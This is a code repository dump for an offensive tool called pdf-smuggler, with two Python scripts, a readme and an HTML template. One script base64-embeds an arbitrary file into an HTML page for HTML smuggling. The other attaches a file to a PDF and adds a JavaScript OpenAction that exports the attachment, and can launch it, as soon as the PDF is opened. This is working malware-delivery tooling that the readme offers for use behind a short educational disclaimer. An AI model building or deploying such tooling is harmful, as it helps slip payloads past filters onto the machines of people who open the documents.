├── html_smuggle.py
├── images
├── pdf_smuggler.jpg
└── placeholder.md
├── pdf-smuggler.py
├── readme.md
└── smuggle_template.html
/html_smuggle.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import os
3 | import sys
4 |
5 | def create_smuggled_html(smuggle_file):
6 | # Read the content of the file
7 | with open(smuggle_file, 'rb') as file:
8 | file_content = file.read()
9 |
10 | # Base64 encode the file content
11 | base64_content = base64.b64encode(file_content).decode('utf-8')
12 |
13 | # Remove the file extension from the filename
14 | filename_without_extension = os.path.splitext(smuggle_file)[0]
15 |
16 | # Read the template HTML file
17 | with open('smuggle_template.html', 'r') as template_file:
18 | template_content = template_file.read()
19 |
20 | # Replace the placeholders with the appropriate values
21 | final_content = template_content.replace('INSERT BASE64 HERE', base64_content)
22 | final_content = final_content.replace('INSERT NAME OF FILE HERE', os.path.basename(smuggle_file))
23 |
24 | # Write the modified content to the new HTML file
25 | output_file = filename_without_extension + '.html'
26 | with open(output_file, 'w') as output:
27 | output.write(final_content)
28 |
29 | print(f'Success! Smuggled HTML file "{output_file}" has been created.')
30 |
31 | if __name__ == '__main__':
32 | if len(sys.argv) != 2:
33 | print('Usage: python smuggle.py ')
34 | sys.exit(1)
35 |
36 | smuggle_file = sys.argv[1]
37 | create_smuggled_html(smuggle_file)
38 |
39 |
40 |
--------------------------------------------------------------------------------
/images/pdf_smuggler.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/duckbillsecurity/pdf-smuggler/14a51ce811ddf1f610b7991dfe0546b3468f164e/images/pdf_smuggler.jpg
--------------------------------------------------------------------------------
/images/placeholder.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/pdf-smuggler.py:
--------------------------------------------------------------------------------
1 | import sys
2 | from PyPDF2 import PdfFileReader, PdfFileWriter
3 | from PyPDF2.generic import NameObject, createStringObject, DictionaryObject
4 |
5 | def add_attachment_to_pdf(inputpdf, file, outputpdf):
6 | # Check if all parameters are provided
7 | if not inputpdf or not file or not outputpdf:
8 | raise ValueError("All parameters (inputpdf, file, outputpdf) are required.")
9 |
10 | # Read the input PDF
11 | reader = PdfFileReader(inputpdf)
12 | writer = PdfFileWriter()
13 |
14 | # Append pages from the input PDF to the writer
15 | writer.appendPagesFromReader(reader)
16 |
17 | # Embed the file as an attachment
18 | with open(file, "rb") as attachment:
19 | writer.addAttachment(file, attachment.read())
20 |
21 | # Set the OpenAction property
22 | open_action = writer._root_object.get("/OpenAction")
23 | if open_action is None:
24 | open_action_dict = DictionaryObject({})
25 | writer._root_object.update({
26 | NameObject("/OpenAction"): open_action_dict
27 | })
28 | else:
29 | open_action_dict = open_action.getObject()
30 |
31 | # JavaScript
32 | open_action_dict.update({
33 | NameObject("/S"): NameObject("/JavaScript"),
34 | NameObject("/JS"): createStringObject('this.exportDataObject({ cName: "%s", nLaunch: 2 });' % file),
35 | })
36 |
37 | # Write the modified PDF to the output file
38 | with open(outputpdf, "wb") as output:
39 | writer.write(output)
40 |
41 | print(f'Success! PDF Smuggled HTML file "{outputpdf}" has been created.')
42 |
43 | if __name__ == "__main__":
44 | # Check if the correct number of command-line arguments is provided
45 | if len(sys.argv) != 4:
46 | print("Usage: pdf2savefile.py inputpdf_file attachment_file outputpdf_file")
47 | else:
48 | # Extract the command-line arguments
49 | inputpdf = sys.argv[1]
50 | file = sys.argv[2]
51 | outputpdf = sys.argv[3]
52 |
53 | # Call the function to add the attachment and /OpenAction to the PDF
54 | add_attachment_to_pdf(inputpdf, file, outputpdf)
55 |
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | ## Disclaimer
2 |
3 | Scripts are for educational and demonstration purposes only. The author does not endorse or condone the use of this script for any criminal or malicious activities and it should only be used where explicitly allowed with proper permission.
4 |
5 | ## Introduction
6 |
7 | Create PDFs with HTML smuggling attachments that save on opening the document.
8 |
9 | ## Instructions
10 |
11 | 1. Create HTML smuggling file using html_smuggle.py.
12 |
13 | The mandatory parameters are:
14 |
15 | - `smugglefile`: The full file path and name of the file for HTML smuggling.
16 |
17 | Note: requires smuggle_template.html file in same location as the script.
18 |
19 | 2. Create final PDF using pdf-smuggler.py.
20 |
21 | The mandatory parameters are:
22 |
23 | - `inputpdf`: The full file path of the original PDF document.
24 | - `file`: The full file path of the file to be attached to the PDF document.
25 | - `outpdf`: The full file path of the final created PDF document.
26 |
--------------------------------------------------------------------------------
/smuggle_template.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | Check downloads folder
4 |
29 |
30 |
31 |
--------------------------------------------------------------------------------